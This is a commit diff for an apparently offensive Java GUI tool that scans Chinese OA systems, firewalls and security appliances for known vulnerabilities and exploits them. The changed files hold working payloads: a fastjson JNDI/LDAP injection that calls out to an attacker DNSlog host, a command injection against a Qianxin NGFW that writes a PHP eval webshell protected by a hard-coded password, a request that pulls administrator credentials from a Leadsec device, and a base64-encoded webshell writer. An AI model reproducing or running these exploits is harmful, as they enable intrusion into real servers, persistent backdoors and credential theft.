0.4

White-hua · Nov 1, 2022 · d91315a · d91315a
1 parent 484bfa3
commit d91315a
Show file tree

Hide file tree

Showing 35 changed files with 979 additions and 536 deletions.
diff --git a/src/main/java/SimpleTest.java b/src/main/java/SimpleTest.java
@@ -1,76 +1,24 @@
 import cn.hutool.core.util.RandomUtil;
-import java.nio.charset.StandardCharsets;
-import java.util.concurrent.CompletionService;
+
+import java.io.UnsupportedEncodingException;
 import java.util.concurrent.ExecutionException;
-import java.util.concurrent.ExecutorCompletionService;
-import java.util.concurrent.ExecutorService;
-import java.util.concurrent.Executors;
-import java.util.concurrent.Future;
-import javax.xml.bind.DatatypeConverter;
-import org.junit.jupiter.api.Test;
+import sun.misc.BASE64Encoder;
+import utils.shell;
 
 public class SimpleTest {
 
-    public static void main(String[] args) throws InterruptedException, ExecutionException {
-
-            char[] a = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".toCharArray();
-            String b = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6";
-            char[] str = "qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdbHthwalGcRu5nHzs".toCharArray();
-            String out = null;
-            for (int i = 0; i < str.length; i++) {
-                out += a[b.indexOf(str[i])];
-            }
-            System.out.println(decode(out));
-
-        ExecutorTest();
-    }
-
-    private static void ExecutorTest() throws InterruptedException, ExecutionException {
-        ExecutorService executorService = Executors.newFixedThreadPool(3);
-
-        CompletionService<Integer> completionService = new ExecutorCompletionService<>(executorService);
-
-        Future<Integer> f1 = completionService.submit(() -> {
-            System.out.println("执行任务一");
-            Thread.sleep(5000);
-            return 1;
-        });
+    private static Object pop;
 
-        Future<Integer> f2 = completionService.submit(() -> {
-            System.out.println("执行任务二");
-            return 2;
-        });
-
-        Future<Integer> f3 = completionService.submit(() -> {
-            System.out.println("执行任务三");
-            Thread.sleep(3000);
-            return 3;
-        });
-
-        for (int i = 0; i < 3; i++) {
-            Future take = completionService.take();
-            Integer integer = (Integer) take.get();
-            executorService.execute(() -> {
-                System.out.println("执行入库==" + integer);
-            });
+    public static void main(String[] args) throws InterruptedException, ExecutionException {
+        try {
+            BASE64Encoder encoder = new BASE64Encoder();
+            String text = "file_put_contents('../../fb6790f4.php','" + shell.readFile(shell.Phppath) +"');";
+            byte[] textByte = text.getBytes("UTF-8");
+            String encodedText = encoder.encode(textByte).replace("\r\n","");
+            System.out.println(encodedText);
+        } catch (UnsupportedEncodingException e) {
+            e.printStackTrace();
         }
-        executorService.shutdown();
-    }
-
-    public static String decode(String base64Str) {
-        // 解码后的字符串
-        String str = "";
-        // 解码
-        byte[] base64Data = DatatypeConverter.parseBase64Binary(base64Str);
-        // byte[]-->String
-        str = new String(base64Data, StandardCharsets.UTF_8);
-        return str;
-    }
-
-
-    @Test
-    public void testRandom(){
-        System.out.println(RandomUtil.randomString(6));
 
     }
 }
diff --git a/src/main/java/controller/AttController.java b/src/main/java/controller/AttController.java
@@ -204,7 +204,16 @@ void Att_clicked(MouseEvent event) {         //ATT按钮
             if (Objects.isNull(textArea_attInfo)) {
               System.out.println("NPE debugger");
             }
-            exploit.checkVul(url, textArea_attInfo);
+
+            Boolean aBoolean = exploit.checkVul(url, textArea_attInfo);
+            if(aBoolean){
+              Platform.runLater(() -> {
+                textArea_attInfo.appendText("\n");
+                textArea_attInfo.appendText("--------------------------------");
+                textArea_attInfo.appendText("\n");
+              });
+            }
+
           } catch (Exception e) {
             if (e instanceof IndexOutOfBoundsException) {
               System.out.println("数组下标越界异常");
@@ -217,11 +226,7 @@ void Att_clicked(MouseEvent event) {         //ATT按钮
             String threadName = "线程：" + Thread.currentThread().getName();
             // String x = threadName + "结束";
             System.out.println(threadName+" spend:" + (System.currentTimeMillis() - start) + "ms");
-            // Platform.runLater(() -> {
-            //   textArea_attInfo.appendText("\n");
-            //   textArea_attInfo.appendText(x);
-            //   textArea_attInfo.appendText("\n");
-            // });
+
             countDownLatch.countDown();
           }
         });
@@ -232,7 +237,7 @@ void Att_clicked(MouseEvent event) {         //ATT按钮
         System.out.println("total spend:" + (System.currentTimeMillis() - start) + "ms");
         Platform.runLater(() -> {
           textArea_attInfo.appendText(
-              "\n\n如需获取shell请勾选 getshell并选择具体漏洞" + " " + DateUtil.now());
+              "\n\n如需获取shell请勾选 getshell并选择具体漏洞 " + DateUtil.now());
         });
       } catch (Exception e) {
         e.printStackTrace();
@@ -287,6 +292,10 @@ public void initialize() {
     textArea_info.appendText("\nwanhu_smartUpload-RCE (可直接执行系统命令)");
     textArea_info.appendText("\nwanhuoa_OfficeServerservlet-RCE(默认写入冰蝎4.0.3aes)");
     textArea_info.appendText("\nwanhu_DocumentEdit-SQlli (mssql数据库 可 os-shell)");
+    textArea_info.appendText("\nwanhuoa_fileUploadController-RCE (默认写入冰蝎4.0.3aes)");
+
+    textArea_info.appendText("\ntongdaoa_getdata-RCE (直接执行系统命令)");
+    textArea_info.appendText("\ntongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)");
 
     textArea_info.appendText(
         "\n\nyongyou_chajet-RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
@@ -295,6 +304,7 @@ public void initialize() {
         "\nyongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)");
     textArea_info.appendText("\nyongyou_NC_FileReceiveServlet-RCE (默认写入冰蝎4.0.3aes)");
     textArea_info.appendText("\nyongyou_GRP_UploadFileData-RCE (默认写入冰蝎4.0.3aes)");
+    textArea_info.appendText("\nyongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)");
 
     textArea_info.appendText("\n\nseeyonoa_main_log4j2-RCE (仅支持检测)");
     textArea_info.appendText("\nseeyonoa_wpsAssistServlet-RCE (默认写入冰蝎4.0.3aes)");
@@ -306,6 +316,7 @@ public void initialize() {
 
     textArea_info.appendText("\n\n综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)");
     textArea_info.appendText("\n网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)");
+    textArea_info.appendText("\n网御星云-上网行为管理账号密码泄露_Leadsec_ACM");
 
     textArea_info.appendText(
         "\n\n-------------------------------(禁止未授权恶意攻击)-----------------------------");
@@ -385,6 +396,9 @@ private void updateListView(String selectedItem) {
       case "致远-OA":
         choiceBox_exp.setItems(exp.zhiyuanoa());
         break;
+      case "通达-OA":
+        choiceBox_exp.setItems(exp.tongdaoa());
+        break;
       case "IIS":
         choiceBox_exp.setItems(exp.iis());
         break;
@@ -394,7 +408,11 @@ private void updateListView(String selectedItem) {
       case "奇安信":
         choiceBox_exp.setItems(exp.qianxin());
         break;
+      case "网御星云":
+        choiceBox_exp.setItems(exp.wangyu());
+        break;
       default:
+        System.out.println(selectedItem);
         // 当所选项还没有exp给默认选项
         choiceBox_exp.setItems(exp.defaultList());
     }

diff --git a/src/main/java/exp/equipment/hikvision/hik_applyCT_fastjson.java b/src/main/java/exp/equipment/hikvision/hik_applyCT_fastjson.java
@@ -1,7 +1,10 @@
 package exp.equipment.hikvision;
 
 import core.Exploitlnterface;
+
 import java.util.HashMap;
+
+import javafx.application.Platform;
 import javafx.scene.control.TextArea;
 import utils.HttpTools;
 import utils.Response;
@@ -10,36 +13,46 @@
 public class hik_applyCT_fastjson implements Exploitlnterface {
     @Override
     public Boolean checkVul(String url, TextArea textArea) {
-        textArea.appendText("\n该漏洞使用dnslog检测 发包后延时5秒查看结果 测试时间略长(10s左右)");
+        Platform.runLater(() -> {
+            textArea.appendText("\n该漏洞使用dnslog检测 发包后延时5秒查看结果 测试时间略长(10s左右)");
+        });
         return att(url, textArea);
     }
 
     @Override
     public Boolean getshell(String url, TextArea textArea) {
-        textArea.appendText("\n 该漏洞不支持getshell  请自行开启ladp服务利用");
+        Platform.runLater(() -> {
+            textArea.appendText("\n 该漏洞不支持getshell  请自行开启ladp服务利用");
+        });
         return false;
     }
 
-    private Boolean att(String url,TextArea textArea){
+    private Boolean att(String url, TextArea textArea) {
         HashMap<String, String> head = new HashMap<>();
         head.put("Content-Type", "application/json");
         Response dns_le1 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
         int dns_1 = dns_le1.getText().length();
 
-        String pay_1 = "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://" + shell.getRandomString() + "." + shell.readFile(shell.dnspath).replace("http://","") + "/\",\"autoCommit\":true},\"hfe4zyyzldp\":\"=\"}";
+        String pay_1 = "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://" + shell.getRandomString() + "." + shell.readFile(shell.dnspath).replace("http://", "") + "/\",\"autoCommit\":true},\"hfe4zyyzldp\":\"=\"}";
         Response post = HttpTools.post(url + "/bic/ssoService/v1/applyCT", pay_1, head, "utf-8");
 
-        try { Thread.sleep (5000) ;
-        } catch (Exception ie){}
+        try {
+            Thread.sleep(5000);
+        } catch (Exception ie) {
+        }
 
         Response dns_le2 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
         int dns_2 = dns_le2.getText().length();
 
-        if(dns_2 > dns_1){
-            textArea.appendText("\n漏洞存在-收到dnslog回显，请使用VPS自行利用");
+        if (dns_2 > dns_1) {
+            Platform.runLater(() -> {
+                textArea.appendText("\n漏洞存在-收到dnslog回显，请使用VPS自行利用");
+            });
             return true;
-        }else {
-            textArea.appendText("\n综合安防_applyCT_fastjson-RCE-漏洞不存在 (出现误报请联系作者)");
+        } else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n综合安防_applyCT_fastjson-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
             return false;
         }
     }

diff --git a/src/main/java/exp/equipment/qianxin/ngfw_waf_router.java b/src/main/java/exp/equipment/qianxin/ngfw_waf_router.java
@@ -1,55 +1,68 @@
 package exp.equipment.qianxin;
 
 import core.Exploitlnterface;
+
 import java.util.HashMap;
+
+import javafx.application.Platform;
 import javafx.scene.control.TextArea;
 import utils.HttpTools;
 import utils.Response;
 import utils.shell;
 
-public class ngfw_waf_router implements Exploitlnterface{
+public class ngfw_waf_router implements Exploitlnterface {
     @Override
     public Boolean checkVul(String url, TextArea textArea) {
         return att(url, textArea, "nishizhu.txt", shell.Testpath);
     }
 
     @Override
     public Boolean getshell(String url, TextArea textArea) {
-        return shell(url,textArea);
+        return shell(url, textArea);
     }
 
-    private  Boolean att(String url,TextArea textArea,String filename,String filepath){
-        HashMap<String,String> head = new HashMap<>();
-        head.put("Content-Type","application/x-www-form-urlencoded");
-        String postString = "{\"action\":\"SSLVPN_Resource\",\"method\":\"deleteImage\",\"data\":[{\"data\":[\"/var/www/html/d.txt;echo '" + shell.readFile(filepath) +"' >/var/www/html/" + filename +  "\"]}],\"type\":\"rpc\",\"tid\":17}";
+    private Boolean att(String url, TextArea textArea, String filename, String filepath) {
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "application/x-www-form-urlencoded");
+        String postString = "{\"action\":\"SSLVPN_Resource\",\"method\":\"deleteImage\",\"data\":[{\"data\":[\"/var/www/html/d.txt;echo '" + shell.readFile(filepath) + "' >/var/www/html/" + filename + "\"]}],\"type\":\"rpc\",\"tid\":17}";
         Response post = HttpTools.post(url + "/directdata/direct/router", postString, head, "utf-8");
-        if(post.getCode() == 200 && post.getText().contains("success")){
+        if (post.getCode() == 200 && post.getText().contains("success")) {
             Response response = HttpTools.get(url + "/" + filename, new HashMap<String, String>(), "utf-8");
-            if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
-                textArea.appendText("\n 漏洞存在，测试文件已写入 \n" + url + "/" + filename);
+            if (response.getCode() == 200 && response.getText().contains(shell.test_payload)) {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 漏洞存在，测试文件已写入 \n" + url + "/" + filename);
+                });
                 return true;
-            }else {
-                textArea.appendText("\n NGFW_waf_router-RCE-漏洞不存在 (出现误报请联系作者)");
+            } else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n NGFW_waf_router-RCE-漏洞不存在 (出现误报请联系作者)");
+                });
                 return false;
             }
-        }else {
-            textArea.appendText("\n NGFW_waf_router-RCE-漏洞不存在 (出现误报请联系作者)");
+        } else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n NGFW_waf_router-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
             return false;
         }
     }
 
-    private Boolean shell(String url,TextArea textArea){
-        HashMap<String,String> head = new HashMap<>();
-        head.put("Content-Type","application/x-www-form-urlencoded");
+    private Boolean shell(String url, TextArea textArea) {
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "application/x-www-form-urlencoded");
         String postString = "{\"action\":\"SSLVPN_Resource\",\"method\":\"deleteImage\",\"data\":[{\"data\":[\"/var/www/html/d.txt;echo '9df37afc77bdd582d90aefaf4e35c63e<?php @eval($_POST[nishizhu]);?>' > /var/www/html/nishizhu.php\"]}],\"type\":\"rpc\",\"tid\":17}";
         HttpTools.post(url + "/directdata/direct/router", postString, head, "utf-8");
-        Response response = HttpTools.get(url + "/nishizhu.php", new HashMap<String, String>(),"utf-8");
-        if(response.getCode() == 200 && response.getText().contains("9df37afc77bdd582d90aefaf4e35c63e")){
-            textArea.appendText("\n shell写入成功 \n" + url + "/nishizhu.php");
-            textArea.appendText("\n 请使用菜刀连接  密码为 nishizhu");
+        Response response = HttpTools.get(url + "/nishizhu.php", new HashMap<String, String>(), "utf-8");
+        if (response.getCode() == 200 && response.getText().contains("9df37afc77bdd582d90aefaf4e35c63e")) {
+            Platform.runLater(() -> {
+                textArea.appendText("\n shell写入成功 \n" + url + "/nishizhu.php");
+                textArea.appendText("\n 请使用菜刀连接  密码为 nishizhu");
+            });
             return true;
-        }else {
-            textArea.appendText("\n 疑似查杀 请自行复现");
+        } else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 疑似查杀 请自行复现");
+            });
             return false;
         }
     }

diff --git a/src/main/java/exp/equipment/wangyu/Leadsec_ACM_account.java b/src/main/java/exp/equipment/wangyu/Leadsec_ACM_account.java
@@ -0,0 +1,40 @@
+package exp.equipment.wangyu;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class Leadsec_ACM_account implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean att = att(url, textArea);
+        return att;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        Platform.runLater(() -> {
+            textArea.appendText("\n 该漏洞无法getshell");
+        });
+        return false;
+    }
+
+    private Boolean att(String url, TextArea textArea) {
+        Response response = HttpTools.get(url + "/boot/phpConfig/tb_admin.txt", new HashMap<String, String>(), "utf-8");
+        if (response.getCode() == 200 && response.getText().contains("admin")) {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 漏洞存在 账号密码如下\n" + response.getText());
+            });
+            return true;
+        } else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n Leadsec_ACM_account-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+}